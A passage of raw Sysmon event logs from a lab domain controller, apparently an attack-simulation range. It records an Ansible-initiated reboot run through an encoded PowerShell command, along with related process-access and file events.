30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e4581f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90ea9291|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b2a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b2a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b131|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e7be51|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e89393|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88c72|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e888ad|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91950bab|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e6db58|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e6d0ca 154100x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.666{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.592{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.592{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:02.576{266CAFBE-6442-6064-E402-00000000AD01}4600\PSHost.132616656025102059.4600.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.560{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qxs1offs.qib.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.560{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qha0iw5x.nbr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.545{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qha0iw5x.nbr.ps12021-03-31 12:00:02.545 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.529{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-6442-6064-E302-00000000AD01}30203016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0fff4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e795b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e5002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6eb3a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e95aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e8665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e93b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9376b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e795b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e78363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e778d5(wow64) 154100x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.510{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABR